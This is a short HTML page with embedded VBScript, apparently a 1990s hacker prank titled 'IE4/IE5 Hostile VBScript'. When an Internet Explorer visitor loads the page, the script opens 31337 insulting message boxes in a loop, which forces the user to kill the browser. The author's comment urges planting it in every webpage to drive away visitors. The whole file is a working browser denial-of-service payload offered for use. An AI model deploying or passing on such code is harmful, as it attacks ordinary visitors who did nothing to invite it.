<!--
 ! IEFuck.html by Wyzewun [wizdumb@leet.org]
 !
 ! Simple code to force IE to get stuck in a near endless loop and have 2b
 ! forced closed by the user - put it in every webpage you make to keep the
 ! great unwashed away from your page. ;-)
 !
 ! Works on IE4 and IE5 with the VBScript Component downloaded
 !
 -->

<html><head><title>IE4/IE5 Hostile VBScript</title><script language="vbscript">

<!--
  For GoingNowhere = 1 to 31337
  MsgBox "Begone thy unwashed cretin - We wish not for thine kind to plague us."
  Next
-->

</script></head><body>
Aren't you glad you're using a real browser? ;-)
</body></html>